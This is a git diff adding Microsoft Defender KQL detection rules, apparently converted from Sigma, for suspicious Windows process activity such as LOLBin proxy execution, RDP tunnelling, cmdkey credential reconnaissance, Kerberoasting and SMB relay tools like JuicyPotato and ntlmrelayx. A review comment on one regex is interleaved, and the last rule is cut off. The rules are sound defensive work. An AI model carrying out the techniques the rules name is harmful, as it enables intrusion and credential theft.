diff --git a/KQL/rules/windows/process_creation/potential_provisioning_registry_key_abuse_for_binary_proxy_execution.kql b/KQL/rules/windows/process_creation/potential_provisioning_registry_key_abuse_for_binary_proxy_execution.kql
new file mode 100644
index 00000000..aec32e87
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_provisioning_registry_key_abuse_for_binary_proxy_execution.kql
@@ -0,0 +1,10 @@
+// Title: Potential Provisioning Registry Key Abuse For Binary Proxy Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel
+// Date: 2023-08-08
+// Level: high
+// Description: Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe".
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "SOFTWARE\\Microsoft\\Provisioning\\Commands\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_provlaunch_exe_binary_proxy_execution_abuse.kql b/KQL/rules/windows/process_creation/potential_provlaunch_exe_binary_proxy_execution_abuse.kql
new file mode 100644
index 00000000..887036a8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_provlaunch_exe_binary_proxy_execution_abuse.kql
@@ -0,0 +1,10 @@
+// Title: Potential Provlaunch.EXE Binary Proxy Execution Abuse
+// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel
+// Date: 2023-08-08
+// Level: medium
+// Description: Detects child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\provlaunch.exe" and (not(((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains ":\\PerfLogs\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains "\\AppData\\Temp\\" or FolderPath contains "\\Windows\\System32\\Tasks\\" or FolderPath contains "\\Windows\\Tasks\\" or FolderPath contains "\\Windows\\Temp\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_psexec_remote_execution.kql b/KQL/rules/windows/process_creation/potential_psexec_remote_execution.kql
new file mode 100644
index 00000000..8e770913
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_psexec_remote_execution.kql
@@ -0,0 +1,10 @@
+// Title: Potential PsExec Remote Execution
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-28
+// Level: high
+// Description: Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1587.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "accepteula" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " \\\\") and (not((ProcessCommandLine contains "\\\\localhost" or ProcessCommandLine contains "\\\\127.")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_ransomware_or_unauthorized_mbr_tampering_via_bcdedit_exe.kql b/KQL/rules/windows/process_creation/potential_ransomware_or_unauthorized_mbr_tampering_via_bcdedit_exe.kql
new file mode 100644
index 00000000..98ed62f8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_ransomware_or_unauthorized_mbr_tampering_via_bcdedit_exe.kql
@@ -0,0 +1,10 @@
+// Title: Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE
+// Author: @neu5ron
+// Date: 2019-02-07
+// Level: medium
+// Description: Detects potential malicious and unauthorized usage of bcdedit.exe
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070, attack.persistence, attack.t1542.003
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "delete" or ProcessCommandLine contains "deletevalue" or ProcessCommandLine contains "import" or ProcessCommandLine contains "safeboot" or ProcessCommandLine contains "network") and (FolderPath endswith "\\bcdedit.exe" or ProcessVersionInfoOriginalFileName =~ "bcdedit.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_rdp_session_hijacking_activity.kql b/KQL/rules/windows/process_creation/potential_rdp_session_hijacking_activity.kql
new file mode 100644
index 00000000..eb7c9a45
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_rdp_session_hijacking_activity.kql
@@ -0,0 +1,12 @@
+// Title: Potential RDP Session Hijacking Activity
+// Author: @juju4
+// Date: 2022-12-27
+// Level: medium
+// Description: Detects potential RDP Session Hijacking activity on Windows systems
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Administrative activity
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\tscon.exe" or ProcessVersionInfoOriginalFileName =~ "tscon.exe") and (ProcessIntegrityLevel in~ ("System", "S-1-16-16384"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_rdp_tunneling_via_plink.kql b/KQL/rules/windows/process_creation/potential_rdp_tunneling_via_plink.kql
new file mode 100644
index 00000000..187c7cc7
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_rdp_tunneling_via_plink.kql
@@ -0,0 +1,10 @@
+// Title: Potential RDP Tunneling Via Plink
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-08-04
+// Level: high
+// Description: Execution of plink to perform data exfiltration and tunneling
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1572
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ":127.0.0.1:3389" and FolderPath endswith "\\plink.exe") or ((ProcessCommandLine contains ":3389" and FolderPath endswith "\\plink.exe") and (ProcessCommandLine contains " -P 443" or ProcessCommandLine contains " -P 22"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_rdp_tunneling_via_ssh.kql b/KQL/rules/windows/process_creation/potential_rdp_tunneling_via_ssh.kql
new file mode 100644
index 00000000..e620dd1d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_rdp_tunneling_via_ssh.kql
@@ -0,0 +1,10 @@
+// Title: Potential RDP Tunneling Via SSH
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-12
+// Level: high
+// Description: Execution of ssh.exe to perform data exfiltration and tunneling through RDP
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1572
+
+DeviceProcessEvents
+| where ProcessCommandLine contains ":3389" and FolderPath endswith "\\ssh.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_recon_activity_using_driverquery_exe.kql b/KQL/rules/windows/process_creation/potential_recon_activity_using_driverquery_exe.kql
new file mode 100644
index 00000000..d1a830fd
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_recon_activity_using_driverquery_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potential Recon Activity Using DriverQuery.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-19
+// Level: high
+// Description: Detect usage of the "driverquery" utility to perform reconnaissance on installed drivers
+// MITRE Tactic: Discovery
+// Tags: attack.discovery
+// False Positives:
+// - Legitimate usage by some scripts might trigger this as well
+
+DeviceProcessEvents
+| where (FolderPath endswith "driverquery.exe" or ProcessVersionInfoOriginalFileName =~ "drvqry.exe") and ((InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\" or InitiatingProcessFolderPath contains "\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Windows\\Temp\\"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_recon_activity_via_nltest_exe.kql b/KQL/rules/windows/process_creation/potential_recon_activity_via_nltest_exe.kql
new file mode 100644
index 00000000..357f8e77
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_recon_activity_via_nltest_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potential Recon Activity Via Nltest.EXE
+// Author: Craig Young, oscd.community, Georg Lauenstein
+// Date: 2021-07-24
+// Level: medium
+// Description: Detects nltest commands that can be used for information discovery
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1016, attack.t1482
+// False Positives:
+// - Legitimate administration use but user and host must be investigated
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\nltest.exe" or ProcessVersionInfoOriginalFileName =~ "nltestrk.exe") and ((ProcessCommandLine contains "server" and ProcessCommandLine contains "query") or (ProcessCommandLine contains "/user" or ProcessCommandLine contains "all_trusts" or ProcessCommandLine contains "dclist:" or ProcessCommandLine contains "dnsgetdc:" or ProcessCommandLine contains "domain_trusts" or ProcessCommandLine contains "dsgetdc:" or ProcessCommandLine contains "parentdomain" or ProcessCommandLine contains "trusted_domains"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_reconnaissance_activity_via_gathernetworkinfo_vbs.kql b/KQL/rules/windows/process_creation/potential_reconnaissance_activity_via_gathernetworkinfo_vbs.kql
new file mode 100644
index 00000000..dd870502
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_reconnaissance_activity_via_gathernetworkinfo_vbs.kql
@@ -0,0 +1,12 @@
+// Title: Potential Reconnaissance Activity Via GatherNetworkInfo.VBS
+// Author: blueteamer8699
+// Date: 2022-01-03
+// Level: medium
+// Description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.execution, attack.t1615, attack.t1059.005
+// False Positives:
+// - Administrative activity
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "gatherNetworkInfo.vbs" and ((FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("cscript.exe", "wscript.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_reconnaissance_for_cached_credentials_via_cmdkey_exe.kql b/KQL/rules/windows/process_creation/potential_reconnaissance_for_cached_credentials_via_cmdkey_exe.kql
new file mode 100644
index 00000000..f996d3c3
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_reconnaissance_for_cached_credentials_via_cmdkey_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE
+// Author: jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-01-16
+// Level: high
+// Description: Detects usage of cmdkey to look for cached credentials on the system
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.005
+// False Positives:
+// - Legitimate administrative tasks
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -l" or ProcessCommandLine contains " /l" or ProcessCommandLine contains " –l" or ProcessCommandLine contains " —l" or ProcessCommandLine contains " ―l") and (FolderPath endswith "\\cmdkey.exe" or ProcessVersionInfoOriginalFileName =~ "cmdkey.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_reflectdebugger_content_execution_via_werfault_exe.kql b/KQL/rules/windows/process_creation/potential_reflectdebugger_content_execution_via_werfault_exe.kql
new file mode 100644
index 00000000..7b35469e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_reflectdebugger_content_execution_via_werfault_exe.kql
@@ -0,0 +1,10 @@
+// Title: Potential ReflectDebugger Content Execution Via WerFault.EXE
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-06-30
+// Level: medium
+// Description: Detects execution of "WerFault.exe" with the "-pr" commandline flag that is used to run files stored in the ReflectDebugger key which could be used to store the path to the malware in order to masquerade the execution flow
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1036
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -pr " and (FolderPath endswith "\\WerFault.exe" or ProcessVersionInfoOriginalFileName =~ "WerFault.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_register_app_vbs_lolscript_abuse.kql b/KQL/rules/windows/process_creation/potential_register_app_vbs_lolscript_abuse.kql
new file mode 100644
index 00000000..827d0d78
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_register_app_vbs_lolscript_abuse.kql
@@ -0,0 +1,12 @@
+// Title: Potential Register_App.Vbs LOLScript Abuse
+// Author: Austin Songer @austinsonger
+// Date: 2021-11-05
+// Level: medium
+// Description: Detects potential abuse of the "register_app.vbs" script that is part of the Windows SDK. The script offers the capability to register new VSS/VDS Provider as a COM+ application. Attackers can use this to install malicious DLLs for persistence and execution.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - Other VB scripts that leverage the same starting command line flags
+
+DeviceProcessEvents
+| where ProcessCommandLine contains ".vbs -register " and ((FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("cscript.exe", "wscript.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_regsvr32_commandline_flag_anomaly.kql b/KQL/rules/windows/process_creation/potential_regsvr32_commandline_flag_anomaly.kql
new file mode 100644
index 00000000..889834e6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_regsvr32_commandline_flag_anomaly.kql
@@ -0,0 +1,12 @@
+// Title: Potential Regsvr32 Commandline Flag Anomaly
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-07-13
+// Level: medium
+// Description: Detects a potential command line flag anomaly related to "regsvr32" in which the "/i" flag is used without the "/n" which should be uncommon.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.010
+// False Positives:
+// - Administrator typo might cause some false positives
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " -i:" or ProcessCommandLine contains " /i:" or ProcessCommandLine contains " –i:" or ProcessCommandLine contains " —i:" or ProcessCommandLine contains " ―i:") and FolderPath endswith "\\regsvr32.exe") and (not(ProcessCommandLine contains " -n " or ProcessCommandLine contains " /n " or ProcessCommandLine contains " –n " or ProcessCommandLine contains " —n " or ProcessCommandLine contains " ―n "))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_remote_desktop_tunneling.kql b/KQL/rules/windows/process_creation/potential_remote_desktop_tunneling.kql
new file mode 100644
index 00000000..a9e6a2a6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_remote_desktop_tunneling.kql
@@ -0,0 +1,10 @@
+// Title: Potential Remote Desktop Tunneling
+// Author: Tim Rauch, Elastic (idea)
+// Date: 2022-09-27
+// Level: medium
+// Description: Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1021
+
+DeviceProcessEvents
+| where ProcessCommandLine contains ":3389" and (ProcessCommandLine contains " -L " or ProcessCommandLine contains " -P " or ProcessCommandLine contains " -R " or ProcessCommandLine contains " -pw " or ProcessCommandLine contains " -ssh ")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_renamed_rundll32_execution.kql b/KQL/rules/windows/process_creation/potential_renamed_rundll32_execution.kql
new file mode 100644
index 00000000..ee44514b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_renamed_rundll32_execution.kql
@@ -0,0 +1,12 @@
+// Title: Potential Renamed Rundll32 Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-22
+// Level: high
+// Description: Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "DllRegisterServer" and (not(FolderPath endswith "\\rundll32.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_rundll32_execution_with_dll_stored_in_ads.kql b/KQL/rules/windows/process_creation/potential_rundll32_execution_with_dll_stored_in_ads.kql
new file mode 100644
index 00000000..52c140d9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_rundll32_execution_with_dll_stored_in_ads.kql
@@ -0,0 +1,10 @@
+// Title: Potential Rundll32 Execution With DLL Stored In ADS
+// Author: Harjot Singh, '@cyb3rjy0t'
+// Date: 2023-01-21
+// Level: high
+// Description: Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.004
+
+DeviceProcessEvents
+| where ProcessCommandLine matches regex "[Rr][Uu][Nn][Dd][Ll][Ll]32(\\.[Ee][Xx][Ee])? \\S+?\\w:\\S+?:" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_script_proxy_execution_via_cl_mutexverifiers_ps1.kql b/KQL/rules/windows/process_creation/potential_script_proxy_execution_via_cl_mutexverifiers_ps1.kql
new file mode 100644
index 00000000..7f1b5c6c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_script_proxy_execution_via_cl_mutexverifiers_ps1.kql
@@ -0,0 +1,10 @@
+// Title: Potential Script Proxy Execution Via CL_Mutexverifiers.ps1
+// Author: Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova, frack113
+// Date: 2022-05-21
+// Level: medium
+// Description: Detects the use of the Microsoft signed script "CL_mutexverifiers" to proxy the execution of additional PowerShell script commands
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1216
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -nologo -windowstyle minimized -file " and FolderPath endswith "\\powershell.exe" and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) and (ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Windows\\Temp\\")
\ No newline at end of file
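Review bot: The regex in the rundll32 ADS hunk spells out case-insensitivity character by character (`[Rr][Uu][Nn][Dd][Ll][Ll]32` and `\\.[Ee][Xx][Ee]`), which is hard to read and easy to get wrong the next time the pattern is edited; KQL `matches regex` uses RE2, which accepts an inline flag, so `"(?i)rundll32(\\.exe)? \\S+?\\w:\\S+?:"` expresses the same match. This looks like the Sigma `re` modifier value passed through verbatim, so the cleanup belongs in the converter rather than in this generated file. The other predicates in the same line use the case-insensitive `endswith` and `=~` operators, so the regex is the only place where case has to be handled explicitly.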
diff --git a/KQL/rules/windows/process_creation/potential_shelldispatch_dll_functionality_abuse.kql b/KQL/rules/windows/process_creation/potential_shelldispatch_dll_functionality_abuse.kql
new file mode 100644
index 00000000..2244e747
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_shelldispatch_dll_functionality_abuse.kql
@@ -0,0 +1,12 @@
+// Title: Potential ShellDispatch.DLL Functionality Abuse
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-06-20
+// Level: medium
+// Description: Detects potential "ShellDispatch.dll" functionality abuse to execute arbitrary binaries via "ShellExecute"
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "RunDll_ShellExecuteW" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_shim_database_persistence_via_sdbinst_exe.kql b/KQL/rules/windows/process_creation/potential_shim_database_persistence_via_sdbinst_exe.kql
new file mode 100644
index 00000000..fbb6dafc
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_shim_database_persistence_via_sdbinst_exe.kql
@@ -0,0 +1,11 @@
+// Title: Potential Shim Database Persistence via Sdbinst.EXE
+// Author: Markus Neis
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects installation of a new shim using sdbinst.exe.
+// Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.011
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".sdb" and (FolderPath endswith "\\sdbinst.exe" or ProcessVersionInfoOriginalFileName =~ "sdbinst.exe")) and (not(((ProcessCommandLine contains ":\\Program Files (x86)\\IIS Express\\iisexpressshim.sdb" or ProcessCommandLine contains ":\\Program Files\\IIS Express\\iisexpressshim.sdb") and InitiatingProcessFolderPath endswith "\\msiexec.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_signing_bypass_via_windows_developer_features.kql b/KQL/rules/windows/process_creation/potential_signing_bypass_via_windows_developer_features.kql
new file mode 100644
index 00000000..04b02374
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_signing_bypass_via_windows_developer_features.kql
@@ -0,0 +1,10 @@
+// Title: Potential Signing Bypass Via Windows Developer Features
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-11
+// Level: high
+// Description: Detects when a user enable developer features such as "Developer Mode" or "Application Sideloading". Which allows the user to install untrusted packages.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "TurnOnDeveloperFeatures" and (FolderPath endswith "\\SystemSettingsAdminFlows.exe" or ProcessVersionInfoOriginalFileName =~ "SystemSettingsAdminFlows.EXE") and (ProcessCommandLine contains "DeveloperUnlock" or ProcessCommandLine contains "EnableSideloading")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_smb_relay_attack_tool_execution.kql b/KQL/rules/windows/process_creation/potential_smb_relay_attack_tool_execution.kql
new file mode 100644
index 00000000..9a5eaee6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_smb_relay_attack_tool_execution.kql
@@ -0,0 +1,12 @@
+// Title: Potential SMB Relay Attack Tool Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-07-24
+// Level: critical
+// Description: Detects different hacktools used for relay attacks on Windows for privilege escalation
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.execution, attack.credential-access, attack.t1557.001
+// False Positives:
+// - Legitimate files with these rare hacktool names
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains ".exe -c \"{" and ProcessCommandLine endswith "}\" -z") or (FolderPath contains "PetitPotam" or FolderPath contains "RottenPotato" or FolderPath contains "HotPotato" or FolderPath contains "JuicyPotato" or FolderPath contains "\\just_dce_" or FolderPath contains "Juicy Potato" or FolderPath contains "\\temp\\rot.exe" or FolderPath contains "\\Potato.exe" or FolderPath contains "\\SpoolSample.exe" or FolderPath contains "\\Responder.exe" or FolderPath contains "\\smbrelayx" or FolderPath contains "\\ntlmrelayx" or FolderPath contains "\\LocalPotato") or (ProcessCommandLine contains "Invoke-Tater" or ProcessCommandLine contains " smbrelay" or ProcessCommandLine contains " ntlmrelay" or ProcessCommandLine contains "cme smb " or ProcessCommandLine contains " /ntlm:NTLMhash " or ProcessCommandLine contains "Invoke-PetitPotam" or (ProcessCommandLine contains ".exe -t " and ProcessCommandLine contains " -p "))) and (not((FolderPath contains "HotPotatoes6" or FolderPath contains "HotPotatoes7" or FolderPath contains "HotPotatoes ")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_spn_enumeration_via_setspn_exe.kql b/KQL/rules/windows/process_creation/potential_spn_enumeration_via_setspn_exe.kql
new file mode 100644
index 00000000..98eb1efd
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_spn_enumeration_via_setspn_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potential SPN Enumeration Via Setspn.EXE
+// Author: Markus Neis, keepwatch
+// Date: 2018-11-14
+// Level: medium
+// Description: Detects service principal name (SPN) enumeration used for Kerberoasting
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1558.003
+// False Positives:
+// - Administration activity
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -q " or ProcessCommandLine contains " /q ") and (FolderPath endswith "\\setspn.exe" or ProcessVersionInfoOriginalFileName =~ "setspn.exe" or (ProcessVersionInfoFileDescription contains "Query or reset the computer" and ProcessVersionInfoFileDescription contains "SPN attribute"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_ssh_tunnel_persistence_install_using_a_scheduled_task.kql b/KQL/rules/windows/process_creation/potential_ssh_tunnel_persistence_install_using_a_scheduled_task.kql
new file mode 100644
index 00000000..5f831e69
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_ssh_tunnel_persistence_install_using_a_scheduled_task.kql
@@ -0,0 +1,10 @@
+// Title: Potential SSH Tunnel Persistence Install Using A Scheduled Task
+// Author: Rory Duncan
+// Date: 2025-07-14
+// Level: high
+// Description: Detects the creation of new scheduled tasks via commandline, using Schtasks.exe. This rule detects tasks creating that call OpenSSH, which may indicate the creation of reverse SSH tunnel to the attacker's server.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005, attack.command-and-control
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") and ((ProcessCommandLine contains " /create " and ProcessCommandLine contains "ssh.exe" and ProcessCommandLine contains "-i") or (ProcessCommandLine contains " /create " and ProcessCommandLine contains "sshd.exe" and ProcessCommandLine contains "-f"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_suspicious_activity_using_secedit.kql b/KQL/rules/windows/process_creation/potential_suspicious_activity_using_secedit.kql
new file mode 100644
index 00000000..13825854
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_suspicious_activity_using_secedit.kql
@@ -0,0 +1,12 @@
+// Title: Potential Suspicious Activity Using SeCEdit
+// Author: Janantha Marasinghe
+// Date: 2022-11-18
+// Level: medium
+// Description: Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.discovery, attack.persistence, attack.defense-evasion, attack.credential-access, attack.privilege-escalation, attack.t1562.002, attack.t1547.001, attack.t1505.005, attack.t1556.002, attack.t1562, attack.t1574.007, attack.t1564.002, attack.t1546.008, attack.t1546.007, attack.t1547.014, attack.t1547.010, attack.t1547.002, attack.t1557, attack.t1082
+// False Positives:
+// - Legitimate administrative use
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\secedit.exe" or ProcessVersionInfoOriginalFileName =~ "SeCEdit") and ((ProcessCommandLine contains "/configure" and ProcessCommandLine contains "/db") or (ProcessCommandLine contains "/export" and ProcessCommandLine contains "/cfg"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_suspicious_browser_launch_from_document_reader_process.kql b/KQL/rules/windows/process_creation/potential_suspicious_browser_launch_from_document_reader_process.kql
new file mode 100644
index 00000000..65341000
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_suspicious_browser_launch_from_document_reader_process.kql
@@ -0,0 +1,12 @@
+// Title: Potential Suspicious Browser Launch From Document Reader Process
+// Author: Joseph Kamau
+// Date: 2024-05-27
+// Level: medium
+// Description: Detects when a browser process or browser tab is launched from an application that handles document files such as Adobe, Microsoft Office, etc. And connects to a web application over http(s), this could indicate a possible phishing attempt.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002
+// False Positives:
+// - Unlikely in most cases, further investigation should be done in the commandline of the browser process to determine the context of the URL accessed.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "http" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\firefox.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\maxthon.exe" or FolderPath endswith "\\seamonkey.exe" or FolderPath endswith "\\vivaldi.exe") and (InitiatingProcessFolderPath contains "Acrobat Reader" or InitiatingProcessFolderPath contains "Microsoft Office" or InitiatingProcessFolderPath contains "PDF Reader")) and (not(ProcessCommandLine contains "https://go.microsoft.com/fwlink/")) and (not(((ProcessCommandLine contains "http://ad.foxitsoftware.com/adlog.php") or (ProcessCommandLine contains "https://globe-map.foxitservice.com/go.php" and ProcessCommandLine contains "do=redirect"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_suspicious_mofcomp_execution.kql b/KQL/rules/windows/process_creation/potential_suspicious_mofcomp_execution.kql
new file mode 100644
index 00000000..46e88abb
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_suspicious_mofcomp_execution.kql
@@ -0,0 +1,12 @@
+// Title: Potential Suspicious Mofcomp Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-12
+// Level: high
+// Description: Detects execution of the "mofcomp" utility as a child of a suspicious shell or script running utility or by having a suspicious path in the commandline.
+// The "mofcomp" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.
+// Attackers abuse this utility to install malicious MOF scripts
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
